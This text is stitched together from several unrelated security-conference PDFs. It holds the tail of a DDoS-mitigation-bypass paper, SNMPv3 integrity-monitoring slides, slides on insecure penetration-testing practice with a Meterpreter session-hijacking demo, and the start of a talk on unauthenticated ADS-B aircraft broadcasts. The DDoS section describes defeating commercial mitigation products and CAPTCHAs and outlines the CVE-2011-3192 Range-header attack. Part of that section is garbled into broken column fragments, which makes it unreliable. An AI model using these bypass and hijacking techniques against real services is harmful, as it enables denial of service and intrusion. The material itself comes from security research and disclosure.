more complex algorithm such as vector quantization or neural network for
recognition. As for re-CAPTCHA, their audio CAPTCHA functionality which is
much weaker than their standard visual counterpart—simple voice recognition
algorithm will be sufficient for breaking it.
4.4
TC
“Kill ‘em
different
connectio
timeout a
values, d
defeated
however,
On the
quick an
complian
from legi
With
internet, s
proliferat
attacks re
layer atta
Applicati
stacks. O
being abl
As des
volume-b
the trigge
reduction
CP Traffic M
m All” provide
kinds of DD
ons interval,
after last requ
different comb
with specific
a combinatio
e TCP/IP laye
d dirty way
nt TCP/IP beh
itimate ones.
web sites an
so are contem
tion of botnet
elying on raw
acks are just as
ion layer attac
Other than easi
le to pass any
scribed in pre
based, request
ering threshold
n in firepower
Model
es tunable TCP
DoS attacks
connection h
uest are expos
binations can
parameter pr
on of art and sc
Figure 1
er, historically
using raw so
aviors that ca
nd web servi
mporary attack
ts together se
w sockets, a st
s devastating,
cks have the
ier to implem
RFC conform
evious section
t-based or oth
d and control
can be more t
P traffic param
can be exec
hold time be
sed to the use
be constructe
rofiles. Figurin
cience, and a
12. TCP timing
y due to many
ockets for per
an be used as a
ces gaining
s focusing on
erve to lessen
aple of the ol
if not more s
luxury of sim
ment, this desig
mance check.
n, rate limitin
herwise, can b
the rate of att
than compens
meters as show
cuted. The nu
efore first re
er, through se
ed. Many pro
ng out the rig
lot of trial and
g controls
DDoS attack
rformance rea
a factor differ
overwhelming
the HTTP lay
n the need for
ld time. The m
o, then their o
mply using th
gn approach h
ng mechanism
be defeated via
tack traffics to
sated with the
wn in Figure
umber of con
quest, conne
etting them to
otection system
ght set of para
d errors.
k tools were w
ason, resultin
rentiating atta
g dominance
yer. Smarter a
r super high-
modern day a
old-school cou
he standard O
has an added
ms, be they tim
a careful asse
o stay just belo
use of large b
12 so that
nnections,
ction idle
o different
ms can be
ameters is,
written in a
ng in non-
ck traffics
over the
attacks and
-efficiency
application
unterparts.
OS TCP/IP
benefit of
me-based,
essment of
ow it. The
botnets.
4.5
HT
“Kill ‘em
to offer v
with shor
In orde
attributes
“Kill ‘
targeted a
construct
comma a
5
Pe
Tests wer
1. A
2. N
as well as
3. C
4. A
We are
market, w
deployed
5.1
Te
Tests we
attack wo
under tes
TTP Traffic
m All” also pro
various attack
rt requests inte
er to avoid be
s as User-Agen
‘em All” allow
attacks. For in
ted with a cust
s delimiter>”.
erformance T
re conducted a
Arbor Peakflo
NSFocus Ant
s cloud servic
Cloudflare, an
Akamai.
e convinced t
with the forme
d in most every
esting Metho
ere conducted
orkstation was
t. For cloud s
Model
ovides tunabl
k vector. For e
erval would yi
Figure 1
ing fingerprin
nt strings and
w allows for t
nstance, CVE
tom header se
.
Testing
against produc
ow SP Threat
i-DDoS Syste
es:
nd
that Arbor TM
er most preva
y publicly liste
dology
d against prod
s connected to
ervice testing
e HTTP traffi
example, large
ield a GET flo
3. HTTP timing
nted, we have
packet sizes.
the constructi
-2011-3192 A
etting of “Ran
cts:
Management
em (ADS) ver
MS and NSFo
alent among F
ed company in
ducts and clo
o a web site t
g a web site w
fic parameters
e number of r
ood DDoS atta
g controls
implemented
on of certain
Apache Range
ge: bytes=<lo
System (TMS
sion 4.5.88.2.
cus ADS repr
Fortune 500 en
n mainland Ch
ud services.
through the D
was placed und
as shown in
requests per c
ack.
randomizatio
web server or
e Header expl
ong list of num
S) version 5.7
026
resent a major
nterprises and
hina.
For product t
DDoS mitigati
der the protect
Figure 13
connection
on for such
r web app
loit can be
mbers with
, and
rity of the
d the latter
testing an
ion device
tion of the
service under test, and then subjected to attacks from a workstation directing attacks
towards it through the internet.
In order to simulate normal short-term browsing conditions, in all tests a single
TCP connection was used to carry a multitude of HTTP requests and responses.
Under this vigorous arrangement not a single attack identification mechanism can be
triggered lest the entire connection gets blocked.
During testing, attack traffic was sent to the backend at which point received traffic
was compared against the original generated traffic. Bypass was considered
successful if all attack traffic passed through intact.
5.2
Testing Results
Attacks with bypass capability were applied against individual detection techniques as
implemented on the aforementioned products and services. During the attack,
effectiveness of the attacks was evaluated and observations were recorded as shown
in Table 1 below. A “” means the bypass was successful with no mitigation activity
observed.
Detection
Techniques
Arbor Peakflow
SP TMS
NSFocus
ADS
Cloudflare
Akamai
Rate Measurement /
Baseline
Enforcement
(Zombie Removal,
Baseline Enforcement,
Traffic Shaping,
Rate Limiting)
N/A
N/A
Protocol Sanity &
Behavior Checking
(HTTP
Countermeasures)
N/A
N/A
Proactive
Housekeeping
(TCP Connection Reset)
N/A
N/A
Big Data Analysis
(GeoIP Policing)
—
(Not implemented
in ADS)
N/A
N/A
Malicious Source
Intelligence
(Black White List,
IP Address Filter List,
Global Exception List,
GeoIP Filter List)
—
(Not implemented
in ADS)
N/A
N/A
Protocol Pattern
Matching
(URL/DNS Filter List,
Payload Regex)
N/A
N/A
Source Host
Verification
TCP SYN
Authentication
N/A
N/A
HTTP Redirect
Authentication
N/A
HTTP Cookie
Authentication
N/A
JavaScript
Authentication
—
(Not implemented)
in TMS)
N/A
CAPTCHA
Authentication
—
(Not implemented
in TMS)
N/A
Table 1. Mitigation bypass testing results.
With reference to Arbor Network’s A Guide for Peakflow® SP TMS Deployment1,
against TMSwe were able to defeat all documented or otherwise active detection
techniques relevant to HTTP DDoS attacks, passing through the TMS unscathed.
Attacks against NSFocus ADS2 were met with remarkable success despite the
presence of heavy-handed defenses including CAPTCHA Authentication — we were
able to achieve a remarkable 50% success rate solving ADS’s CAPTCHA
implementation with our OCR algorithms. Due to the shotgun approach to attack, and
that getting whitelisted is a big win for the attacker, a 50% success rate for solving
CAPTCHA is much more impressive than it may appear at first glance.
Cloudflare essentially employs JavaScript that implements all JavaScript, Cookie
and Redirect Authentications in one. We were successful in defeating them all and
pushing attack traffic to the backend. Even though Cloudflare does support
CAPTCHA Authentication, we observed that its use is not particularly prevalent in
the wild, and for the purpose of our PoC since we have already demonstrated a
workable solution against CAPTCHA for ADS, we have opted not to repeat this for
Cloudflare.
Akamai has implemented source host verification techniques in its security
solutions for a few months now, with which according to marketing brochure [7]
visitors will be redirected to a JavaScript confirmation page when traffic is identified
as potentially malicious. However, despite our best effort sending big traffic to our
testing site bearing random HTTP query strings (in order to thwart caching) we have
been unable to trigger that feature. Whereas we cannot rule out the remote possibility
that our test traffic was way below detection threshold, a much more plausible reason
might be that our traffic was indistinguishable from that generated by a real browser.
1
http://www.arbornetworks.com/component/docman/doc_download/301-threat-management-
system-a-technical-overview?Itemid=442
2
http://www.nsfocus.com/jp/uploadfile/Product/ADS/White%20Paper/NSFOCUS%20ADS%
20White% 20Paper.pdf
6
Discussions and Next Generation Mitigation
In this era of blended attacks, detection methods designed to pick out bad traffics are
rendered fundamentally ineffective. The reason why today to a certain extent they still
work is mainly due to implementation immaturity (e.g. the lack of ready-to-use
JavaScript engine with a workable DOM). Obviously these hurdles can be easily
overcome given a little more time and development resources, as our research
demonstrated.
A notable exception is the use of CAPTCHA. Despite the fact that we have also
demonstrated defeating certain CAPTCHA implementations in use on security
products, and that there have been promising results from fellow researches [8] as
well, admittedly CAPTCHA still represent the pinnacle of source host verification
technique. However, CAPTCHA is necessarily a heavy-handed approach that
materially diminishes the usability and accessibility of protected web sites.
Specifically, automated queries and Web 2.0 mashing are made impossible. This
shortcoming significantly reduces the scope of its application. It is therefore not
surprising that CAPTCHA is often default off in security service offerings.
6.1
Next Generation Mitigation
Seeing as that the underlying issue with a majority of DDoS attacks these days is their
amplification property, which tips the cost-effectiveness balance to the attackers’
favor, we are convinced that a control mechanism based on asymmetric client puzzle
is the solution, as it presents a general approach that attacks directly this imbalance
property, making it a lot more expensive to execute DDoS attacks. Prior researches
include the seminal Princeton-RSA paper [9] and [10].
7
Acknowledgement
This research was made possible only with data and testing resources graciously
sponsored by Nexusguard Limited3 for the advancement of the art.
References
[1] M. Prince, "The DDoS that Knocked Spamhaus Offline (And How We Mitigated
it)," 20 March 2013. [Online]. Available: http://blog.cloudflare.com/the-
ddos-that-knocked-spamhaus-offline-and-ho.
[2] T. T. N. Miu, A. K. T. Hui, W. L. Lee, D. X. P. Luo, A. K. L. Chung and J. W.
S. Wong, "Universal DDoS Mitigation Bypass," in Black Hat USA, Las
Vegas, 2013.
3 http://www.nexusguard.com/
[3] C. Weinschenk, "Attacks Go Low and Slow," IT Business Edge, 3 August 2007.
[Online].
Available:
http://www.itbusinessedge.com/cm/community/features/interviews/blog
/attacks-go-low-and-slow/?cs=22594.
[4] R. Hansen, "Slowloris HTTP DoS," 7 June 2009. [Online]. Available:
http://ckers.org/slowloris/.
[5] Carnegie Mellon University, "CERT® Advisory CA-1998-01 Smurf IP Denial-
of-Service
Attacks,"
5
January
1988.
[Online].
Available:
http://www.cert.org/advisories/CA-1998-01.html.
[6] J. Breeden II, "Hackers' New Super Weapon Adds Firepower to DDOS," GCN,
24
October
2012.
[Online].
Available:
http://gcn.com/articles/2012/10/24/hackers-new-super-weapon-adds-
firepower-to-ddos.aspx.
[7] Akamai, "Akamai Raises the Bar for Web Security with Enhancements to Kona
Site
Defender,"
25
February
2013.
[Online].
Available:
http://www.akamai.com/html/about/press/releases/2013/press_022513.h
tml.
[8] DC949, "Stiltwalker: Nucaptcha, Paypal, SecurImage, Slashdot, Davids Summer
Communication,"
26
July
2012.
[Online].
Available:
http://www.dc949.org/projects/stiltwalker/.
[9] B. Waters, A. Juels, J. A. Halderman and W. F. Edward, "New Client Puzzle
Outsourcing Techniques for DoS Resistance," in ACM Conference on
Computer and Communications Security (CCS), 2004, 2004.
[10] D. Stebila, L. Kuppusamy, J. Rangasamy and C. Boyd, "Stronger Difficulty
Notions for Client Puzzles and Denial-of-Service-Resistent Protocols,"
in RSA Conference, 2011.
[11] T. Miu, A. Lai, A. Chung and K. Wong, "DDoS Black and White "Kungfu"
Revealed," in DEF CON 20, Las Vegas, 2012.
[12] R. Kenig, "How Much Can a DDoS Attack Cost Your Business?," 14 May 2013.
[Online].
Available:
http://blog.radware.com/security/2013/05/how-
much-can-a-ddos-attack-cost-your-business/. | pdf |
Slide 1
Replacing TripWire with SNMPv3
Matthew G. Marsh
Chief Scientist of the NEbraskaCERT
Slide 2
Scope
Quick Overview & History of SNMP
Definitions & Terminology
SNMPv3 will be implicit in the rest of the sections
RFC(s) that define v3
Highlights - why use v3
Authentication
Privacy
Security Scope
General Usage
Net-SNMP
PakDefConX MIB
PakDefConX Source Code
Usage Example
Discussion
Slide 3
History
SNMP is defined by four features:
A data definition language
Management Information definition
A protocol definition
Security and Administration definition
Standard 15 defines the protocol (SNMP)
Standard 16 defines the structure of management information
Standard 17 defines MIB-II
All SNMP information and organization is specified using Abstract Syntax Notation One (ASN.1) (ISO Standard)
SNMPv1 came into being and use in the late 1980's. By 1990 most equipment capable of speaking TCP/IP used SNMPv1 for
management capabilities. Some vendors, most notably WellFleet, used SNMP as the basis for all interaction with the
equipment.
SNMPv1 was defined by three modes of operation
Read - a mode of obtaining information from a device based on a query/response
Write - a mode of setting parameters within a device based on query/response
Trap - a mode for a device to send information about itself without a query
These first two modes used basic single passwords as the authentication and security measures
SNMPv1 was designed for and used UDP as the main transport mode
Contrary to popular belief v1 did provide a framework for authentication, privacy, and authorization; however there were no
actual protocol structures, designs, or implementations done within this framework.
SNMPv2 came in several incarnations as it was developed. One of the primary original design goals for v2 was to structure
and design authentication, privacy, and authorization. However this was not realized although much of the structure formality
was completed.
SNMPv2 added better data types and efficiency along with the first use of TCP for data transport confirmation
SNMPv2 essentially came in three major flavours: v2c, v2u, v2*(v2p)
V2c was "officially endorsed" but v2u/v2p had security structures (authentication, privacy, authorization)
Slide 4
Definitions and Terminology
Abstract Syntax Notation One (ASN.1) (ISO Standard)
.1.3.6.1 = .iso.org.dod.internet
This is the tree from whence all MIB things come... ;-}
OID - Object ID is the reference to the ASN.1 code which defines an object
.1.3.6.1.4.1.9248 is the OID assigned to Paktronix Systems LLC
Paktronix Systems MIBs would begin from this OID and branch outward and downward
.1.3.6.1.4.1.9248.1.1.1 is the settable string of the file to be hashed and is fully decoded as:
.iso.org.dod.internet.private.enterprises.Paktronix.PakDC.PakSETFiles.PakTestFileString
Structure of Management Information - SMI defines the structure of the data (data definition language)
SMIv1 is the format used in SNMPv1/v2
SMIv2 is the new extended improved format
Community - the password used in v1 and v2c
Read was by popular default = public
Write was by popular default = private
Agent - the device about which information is desired
Hub, router, coffee machine ^H^H Java Dispenser...
Manager - the device which "manages" an agent
NetView, OpenView, Tivoli, Unicenter, etal are Managers
Managers typically query many remote agents but in some cases you can have a device that is both manager and agent in
one.
MIB - Management Information Base
Think of a database tree with all of the relevant information for a particular device
Generic MIB is called MIB-II (as opposed to MIB-I...) and is defined in RFC 1213
Authentication - proving you are who you say you are (password/community/...)
Privacy - encryption of the data in transport
Authorization - Access Control applied to MIBs
Authorization is typically done by specifying subsets or even individual OIDs
Trap - an Agent initiated data transfer
Slide 5
RFC Documents
SNMP Version 3 is the current version of the Simple Network Management
Protocol. This version was ratified as a Draft Standard in March of 1999.
RFC 2570: Introduction to Version 3 of the Internet-standard Network Management Framework, Informational, April 1999
RFC 2571: An Architecture for Describing SNMP Management Frameworks, Draft Standard, April 1999
RFC 2572: Message Processing and Dispatching for the Simple Network Management Protocol (SNMP), Draft Standard, April
1999
RFC 2573: SNMP Applications, Draft Standard, April 1999
RFC 2574: User-based Security Model (USM) for version 3 of the Simple Network Management Protocol (SNMPv3), Draft
Standard, April 1999
RFC 2575: View-based Access Control Model (VACM) for the Simple Network Management Protocol (SNMP), Draft Standard,
April 1999
RFC 2576: Coexistence between Version 1, Version 2, and Version 3 of the Internet-standard Network Management
Framework, Proposed Standard, March 2000
These documents reuse definitions from the following SNMPv2 specifications:
RFC 1905: Protocol Operations for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft Standard
RFC 1906: Transport Mappings for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft Standard
RFC 1907: Management Information Base for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft
Standard
Slide 6
SNMPv3 Highlights
Authentication
MD5 or SHA authentication passphrase hashes
Passphrase must be greater than 8 characters including spaces
Privacy
Packet data may now be DES encrypted (future use allows additional encryptions)
Passphrase defaults to authentication passphrase
Allows for unique Privacy passphrase
Inform Traps
Old style trap was "throw-n-pray" over UDP
v2 Inform trap is over TCP and requires a response
Traps may also have Authentication and Privacy passphrases
Security Structures
User / Scope / ACL all may have independent AuthPriv structures
SNMP Version 3 - Important Points
Slide 7
Authentication
User
Defines the unit of access
Group
Defines class for application of scope
View
Defines a set of resources within a MIB structure
Operation
Defines the actions that may be performed
READ
WRITE
ADMINISTER
Operations are applied to Views
Users are assigned to Groups
Groups are assigned Views
SNMP Version 3 - Authentication
Slide 8
Privacy
SNMP v1 and v2c transported data in clear text
v3 allows the data payload to be encrypted
Currently the specification only allows for DES
May be overridden for custom applications
Specification allows for multiple encryption mechanisms to be defined
Passphrase defaults to using the authentication passphrase
Passphrase may be completely separate and unique
Privacy must be specified in conjunction with authentication
Allowed: NONE, authnoPriv, authPriv
SNMP Version 3 - Privacy
Slide 9
Security Structures
Passphrases are applied to User object only in current specification
Thus divorcing the ACL applied to the User from the AuthPriv functions
Each User object may have unique passphrases
Specification extensions are being considered to allow
Passphrases for Groups
Passphrases for Views
Multiple Passphrases per User
Per Operation Mode
Typically there is one User defined per Operation Mode
SNMP Version 3 - Security Structures
Slide 10
Misc Implementation Notes
Implementation is requestor/provider model
On Provider
Services through daemon process
Concept of "Engine ID"
Core of authPriv passphrases security
First pass hash mechanisms for storage
On Requestor
Services through query of Provider
"Engine ID" also important
Engine ID provides significant security addition through first pass hash
SNMP Version 3 - Misc
Slide 11
General Usage Notes
Use multiple Users
One for each action (get, set, trap)
Different Authentication passphrases
Always use Privacy - authPriv
Make sure the passphrases are different from the User's
For custom applications consider defining and using your own
authentication and privacy encryption methods
PakSecured extensions use mhash libraries thus allowing use of any of
the mechanisms they contain (see sourcecode)
Easily extensible to use mcrypt (or libraries of choice)
Always set up your initial security in a secure environment before exposing
the system to the elements.
SUMMARY: SNMP is a Message Passing Protocol.
Slide 12
Net-SNMP
Net-SNMP has had v3 since 1998
http://www.netsnmp.org
_the_ reference application for SNMP
Originally based on the Carnegie Mellon University and University of
California at Davis SNMP implementations.
Includes various tools relating to SNMP including:
An extensible agent
An SNMP library
Tools to request or set information from SNMP agents
Tools to generate and handle SNMP traps
Can use multiple transports
IPv4 UDP/TCP
IPv6 UDP/TCP
IPX on Linux !!!
Slide 13
PakDefConX MIB
PakDefConX
::= { enterprises 9248 }
PakDC
OBJECT IDENTIFIER ::= { PakDefConX 1 } -- The OBJECT IDENTIFIER for all PakDefConX tricks
PakSETFiles
OBJECT IDENTIFIER ::= { PakDC 1 }
PakTestFileString OBJECT-TYPE
SYNTAX OCTET STRING (SIZE(0..1024))
MAX-ACCESS
read-write
STATUS current
DESCRIPTION
"A publicly settable string that can be set for testing
snmpsets. This value will eventually be used as the file
name for the PakHash function.
::= { PakSETFiles 1 }
PakTestFileHash OBJECT-TYPE
SYNTAX String
MAX-ACCESS
read-only
STATUS current
DESCRIPTION
"This object returns the md5sum of the file name
set into PakFileTestString.
Only the md5sum is returned."
::= { PakSETFiles 2 }
Slide 14
PakDefConX Source Code
Source is provided as a patch against Net-SNMP v5.x
Tested on all versions up to 5.0.2.pre1 as of 7/8/2002
Get Net-SNMP version 5 - CVS usually works best.
Apply the patch (patch -p1 < {patch file location}
Edit the PakConfigure file in the source root dir
Run the PakConfigure file (bash PakConfigure)
make; make install
Play
Requires that mhash library 0.8.10 or greater be installed.
http://mhash.sourceforge.net
Slide 15
The Point (why you are here...)
Assuming that you have the Net-SNMP patched and compiled:
Install an SNMPv3 user for the daemon
cat > /var/net-snmp/snmpd.conf
createUser defconx MD5 defconxv3 DES defconxcrypt ^D
cat > /usr/local/share/snmp/snmpd.conf
rwuser defconx ^D
Fire up the daemon - /usr/local/sbin/snmpd
Now to play with the mib defs:
snmpwalk -u defconx -l authPriv -a MD5 -A defconxv3 -x DES -X defconxcrypt localhost .1.3.6.1.4.1.9248
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/hosts"
PAKDEFCONX-MIB::PakTestFileHash.0 = STRING: "5b41d38e2a46d028902e3cecf808c582"
DEFINE {insert Stuff} = '-u defconx -l authPriv -a MD5 -A defconxv3 -x DES -X defconxcrypt'
snmpset {insert Stuff} localhost .1.3.6.1.4.1.9248.1.1.1.0 s "/etc/services"
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/services"
snmpwalk {insert Stuff} localhost .1.3.6.1.4.1.9248
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/services"
PAKDEFCONX-MIB::PakTestFileHash.0 = STRING: "24fd8b34bc51d3ebfab4784ca63a70e7"
FV Oiler.
Slide 16
Comments, Critiques, CIA
These are words that begin with a 'c'
Slide 17
Replacing TripWire with SNMPv3
Matthew G. Marsh
Chief Scientist of the NEbraskaCERT | pdf |
Wesley McGrew, Ph.D.
Director of Cyber Operations
[email protected]
@McGrewSecurity
Secure Penetration
Testing Operations
Demonstrated Weaknesses in
Learning Material and Tools
Bio
• Co-Founder of HORNE Cyber, previously
Halberd Group
• Directs and participates
• Penetration testing engagements
• Research and development
• Adjunct professor at Mississippi State University
• NSA-CAE Cyber Operations program
• Information Security & Reverse Engineering
Insecure practices used on penetration tests put
clients and penetration testers alike at risk.
Penetration testers and clients during/between
engagements are attractive soft targets.
The root cause of this problem is a lack of awareness,
and learning materials that teach insecure practices.
This has to change.
The Situation at a Glance
• Previous and Current Work
• The Threat
• Role of Learning and Reference Materials
• Analysis of Currently-Available Materials
• Recommended Best Practices
• Demonstration and Tool Release
• Snagterpreter – Hijack meterpreter sessions
• Conclusions
• Call to Action
What are we covering today?
Two previous papers & presentations, DEF CON 21 and 23
Where are we?
This work – a paper and talk studying the root
causes of these issues, recommending change.
Why is the compromise of a
penetration tester attractive?
As a Target
Tools, tactics, procedures. Intellectual property.
Operational Cover For Compromising Clients
Testers are expected to break rules, attack,
elevate privilege, exfiltrate.
The Threat
No Standard
Dependent on experience, intuition, pattern recognition,
and complex ad-hoc processes
Tradeoff: Flexibility vs. Rigor
We operate as we learn
Lowest Common Denominator = Profit
No formal requirements for education
Few prerequisites
No testing requirements
Cause and Effect
Testing Processes Follow Training
Convenience and Expediency
Lower Depth & Breadth of Technical Knowledge
Lack of Situational Awareness in Secure
Operation/Communication
Re-applying procedures learned in reading/training to
more complex operational environments
Cause and Effect
How are secure practices in
penetration testing covered
(or not covered) in learning and
reference materials?
Books, Training, Standards
Documents
The Study – The Goal
Books: 16
Top Amazon results, well-known and popular books
Training: 3
Publicly available material, limited (NDAs, cost)
Standards: 4
Well known
The Study – The Material
Disclosure:
You’ll see from the results: the lack of coverage of secure
practices, and the promotion of vulnerable practices, is the
norm, not an outlier.
Titles, author names, sources, are not stated. The purpose is
to demonstrate an industry-wide need to move forward.
Examples are provided, if you’re well-read, you may
recognize them.
The Study – Disclosure
Host Security,
Penetration Tester
Does the work address precautions for
preventing penetration testers’ systems
from being compromised?
The Study – The Questions
Host Security, Client
Does the work address precautions for
maintaining the security of client
systems during the test?
The Study – The Questions
COMSEC
Does the work address establishing
secure means of communicating with
the client about the engagement?
The Study – The Questions
Client Data in Transit
Does the work address issues
surrounding the transmission of
sensitive client data between targets
and penetration testers’ systems in the
course of the engagement?
The Study – The Questions
Client Data at Rest
Does the work discuss procedures for
securing client data at rest, during,
and/or after the engagement?
The Study – The Questions
OSINT OPSEC
Does the work address operational
security during intelligence gathering
phases?
The Study – The Questions
Potential Threats
Does the work address issues with
conducting tests against systems over
hostile networks, such as the public
Internet or unencrypted wireless?
The Study – The Questions
Insecure Practices
Does the work demonstrate or teach at
least one example of an insecure
practice without describing how it might
leave the tester or client vulnerable?
The Study – The Questions
Results
Resource
1 - Host Security - Penetration Tester
2 - Host Security - Client
3 - COMSEC
4 - Client Data - In Transit
5 - Client Data - At Rest
6 - OSINT OPSEC
7 - Potential Threats
8 - Insecure Practices
1
Y
N
N
N
Y
N
N
N
2
N
N
N
N
N
N
N
Y
3
N
N
N
N
N
N
N
Y
4
N
N
N
N
N
N
N
Y
5
Y
Y
Y
Y
Y
Y
Y
N
6
N
N
N
Y
Y
N
N
Y
7
N
N
N
N
N
N
N
Y
8
N
N
N
N
N
N
N
Y
9
N
Y
N
N
Y
N
N
Y
10
N
N
N
N
N
N
N
Y
11
N
N
N
N
N
N
N
Y
12
N
N
N
N
N
N
N
N
13
N
Y
Y
Y
Y
Y
N
Y
14
N
N
N
N
N
N
N
Y
15
N
N
N
N
N
N
N
Y
16
N
N
N
N
N
N
N
Y
17
N
N
N
N
N
N
N
Y
18
N
N
Y
Y
N
N
N
Y
19
N
Y
N
Y
Y
N
N
Y
20
N
N
N
N
Y
N
N
Y
21
N
N
N
N
N
N
N
Y
22
N
N
N
N
N
N
N
Y
23
Y
N
N
Y
Y
N
N
Y
Mostly red!
Almost
every one
specifically
teaches
insecure
practice.
Out of 24 works…
14 did not address basic issues.
4 addressed more than two issues.
Every work that actually covered technical
practices described actions that were potentially
dangerous/insecure.
2 did not cover technical practices
1 Warned about unencrypted networks
Analysis
Unencrypted
command and control
netcat, web shells, default
meterpreter, etc.
Analysis – Most Common Flaw
You’ll have to attend or watch
the talk itself to hear specific
(an humorous) examples of
the most insecure practices
presented in the works
studied.
“Greatest Hits”
Client Communication Security
OSINT OPSEC
Awareness
Host Security – Client and Pentester
Data at Rest
Recommendations
Demonstration
Snagterpreter
Hijacking HTTP/HTTPS meterpreter sessions.
•
Metasploit’s Meterpreter – Most commonly used and documented
penetration testing implant/post-exploitation tool.
•
Easy to use, more fully featured than a shell, therefore popular
•
Operational use – Often traversing hostile networks, such as the
public Internet.
•
Protocols
•
Type-Length-Value – Commands & Responses
•
Transport – TCP, or HTTP/HTTPS for stateless resilience
•
Default encryption is for evasion, not security!
•
The developers know this, have implemented paranoid mode to
validate server & client certificates
•
Nobody teaches anyone how to use this apart from official docs
•
Let’s demonstrate non-paranoid-mode hijacking…
What’s going on in this demo?
Penetration tester,
test thyself!
Conclusions
•
In this work:
•
Explained threats
•
Demonstrated vulnerabilities
•
You cannot have it both ways
•
You can’t report on vulnerabilities in situations involving
malicious actors intercepting and modifying traffic.
•
…while ignoring that threat model in your own operations
•
We must improve
•
Tools
•
Techniques
•
Processes
•
It all has to be integrated into learning material
Conclusions
Take-Away Points
Wesley McGrew
[email protected]
@McGrewSecurity
Materials
White paper, slides, code
https://hornecyber.com/ <precise URL provided in final slides>
Contact
•
Penetration testers put their selves and clients at risk with
insecure practices. Third-party malicious attackers can take
advantage of this.
•
The root cause: Learning material available teach insecure
practices and do not address security issues. This leads to lack of
rigor in penetration testing practices.
•
Direct and mindful action must be taken by penetration testers,
tool developers, and learning material authors to remedy this
problem. | pdf |
Hackers +
Airplanes
No Good Can Come Of This
Defcon 20
Brad “RenderMan” Haines, CISSP
www.renderlab.net
[email protected]
Twitter: @IhackedWhat
+
=
Who Am I?
Who Am I?
Consultant – Wireless, Physical,
General Security, CISSP
Author – 7 Deadliest Wireless
Attacks, Kismet Hacking, RFID
Security
Trainer – Wireless and Physical
security
Who Am I?
Hacker – Renderlab.net
Hacker Group Member – Church of
Wifi, NMRC
Defcon Old Timer – Every year
since DC7
Consultant – Wireless, Physical,
General Security, CISSP
Author – 7 Deadliest Wireless
Attacks, Kismet Hacking, RFID
Security
Trainer – Wireless and Physical
security
Who Am I?
First, The Kaminsky Problem
● At multiple cons, over multiple years, speaking
in opposite rooms
● Getting rather ridiculous
● I have yet to see any of his talks live
● Summed up as the “RenderMan Birthday
Paradox” on his blog
● Ironic since yesterday (27th) was my birthday
● Can someone confirm if they are schedualing
this intentionally!
Ass Covering
● For the love of Spongebob, do not actually try
any of the ideas in this talk outside of a lab!!!
● We are talking about commercial airliners and
peoples lives here; serious stuff
● Use this information to make air travel safer
● Think about how this happened and make sure
future systems are built secure from the start
● Hackers need to be included in more areas
than we are now
Ass Covering
● I Want To Be Wrong!; If I am wrong about something,
call me on it, publicly!
● I am not a pilot, ATC operator, or in any way associated
with the airline industry or aviation beyond flying cattle
class. A Lot!
● I may have some details or acronyms wrong, I
apologize, feel free to correct me
● This research is ongoing and too important to keep
hidden until completion
● I want to prove to myself this is safe, so far I've failed,
so I need your help
It All Started With An App
● I got interested purely by
accident
● Bought Planefinder AR in
October 2010
● Overlays flight information
through camera
● GPS location + Direction +
web lookup of flights
● This is cool, how does it
work?
Planefinders
● Planefinder.net, Flightradar24.com, Radarvirtuel.com
● Aggregates data from all over the world
● User provided ground stations and data
● Generates near real time (~10 min delay) Google Map of
air traffic
● Supports queries for Airlines, cities, tail numbers, flight
numbers, etc
● Lots of interesting info
● Also contained info on how the site and App worked
It Went Downhill From There
● Been under-employed
for over a year
● When I get bored, bad
things happen
● I still fly to a lot of
speaking gigs
● Started thinking about
airplane tracking
● This is why I should
always be employed
Current Air Traffic Control
● Has not changed much since
1970's
● Primary radar provides range
and bearing, no elevation
● Transponder system (SSR)
queries the plane, plane
responds with a 4-digit
identifier + elevation
● ID number attached to flight
on radar scope, great deal of
manual communication and
work required
Current Air Traffic Control
● Transponder ID used to communicate situations
i.e. emergencies, hijacking, etc
● Transponder provides a higher power return
than primary radar reflection, longer range
● Only interrogated every 6-12 seconds, low
resolution of altitude
● Pilots get no benefit (traffic, etc)
● Requires large separation of planes (~80miles)
which limits traffic throughput in busy areas
Current Air Traffic Control
● IVR flights are way point
based, not optimal or direct
path
● Air travel is increasing,
capacity is limited
● Weather and other events
(i.e. Volcano's) can cause
havoc around the world
● Something needed to
change
Nextgen Air Traffic Control
● Late 90's FAA initiative to revamp the ATC
system in the US, and via ICAO, the world
● Do more with less
● Modernize the ATC system over approximately
20 years
● Save costs on ATC equipment, save fuel, save
time, increase capacity
● ADS-B is the key feature, the datasource for
Planefinder sites and the focus of this talk
ADS-B
● Automatic Dependant Surveillance Broadcast
● Planes use GPS to determine their position, broadcast over
1090Mhz (978Mhz for GA) at 1Hz
● Contains Aircraft ID, altitude, position lat/lon, bearing, speed
● Recieved by a network of groundstations
● Particularly useful over radar 'dead zones', i.e. mountainous
regions, Oceans, Hudsons Bay, Gulf of Mexico, Alaskan
mountains
● Certainty of location allows for flights to be closer (5 miles)
● Two forms: ADS-B Out and ADS-B In
ADS-B Out
Looks a lot like any other network packet doesn't it?
ADS-B Out
● No interrogation needed (Automatic)
● Instead of primary/secondary radar, planes
report their location from GPS (Dependant)
● Sent omni-directionally to ground stations and
other aircraft (Broadcast)
● ATC's scope is populated from received signals
● Uses1090Mhz for commercial (big stuff),
978Mhz for General aviation (small stuff)
ADS-B In
● ADS-B IN: Optional equipment can be installed in aircraft to
listen to ADS-B out from planes and ATC
● Allows planes to be aware of each other without ATC
intervention (TIS-B)
● Also allows for real time weather data (FIS-B)
● Situational awareness increases dramatically, allows more
flights operate simultaneously
● Also works for ground equipment and taxiing aircraft
● Expensive!! $5-10K for ADS-B out, $20K for ADS-B In
● GA market getting cheaper though
● Not a lot of used market yet (problem for researchers)
Planefinder.net
(London, 7/11/12)
Scary Stuff
● The hacker side of my brain took over
● Started to investigate how this worked and what
measures may be in use to mitigate threats
● Could not immediately find answers (trust us!)
● Previous experience shows no answer usually
means hadn't thought of it, or have thought of it,
but too late, lets hide the answer
● Started digging deeper and found I'm not the
only one
And Now The Scary Part
● ADS-B is unencrypted and unauthenticated
● Anyone can listen to 1090Mhz and decode the
transmissions from aircraft in real time
● Simple Pulse Per Second modulated
● No data level authentication of data from aircraft, just
simple checksums
● Some correlation of primary radar sighting to received
data (changing to Multilateration, More on that later)
● I am running a ground station at home, monitoring all
traffic in and out of Edmonton
Others
● Others have begun to look and to question
● Righter Kunkel, Defcon 18
